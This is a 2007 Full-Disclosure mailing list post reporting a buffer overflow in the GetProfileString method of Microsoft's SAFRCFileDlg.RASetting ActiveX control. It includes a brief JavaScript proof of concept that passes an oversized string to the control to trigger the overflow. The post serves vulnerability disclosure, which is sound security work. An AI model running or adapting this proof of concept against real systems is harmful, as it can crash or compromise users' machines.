[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Microsoft Remote Help safrcdlg.dll Buffer Overflow
- To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] Microsoft Remote Help safrcdlg.dll Buffer Overflow
- From: Elazar Broad <elazarb@xxxxxxxxxxxxx>
- Date: Mon, 12 Nov 2007 14:45:03 -0500 (EST)
The GetProfileString function of the SAFRCFileDlg.RASetting control contains a
buffer overflow. This control is NOT marked safe for scripting, and seems to
execute in the context of the user, so I am not sure what can be done
maliciously with this. Never the less, it is a buffer overflow. PoC as follows:
------------------
//written by e.b.
var s = "AAAA";
while (s.length < 999 * 999) s=s+s;
var obj = new ActiveXObject("SAFRCFileDlg.RASetting");
obj.GetProfileString(s);
------------------
Elazar
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/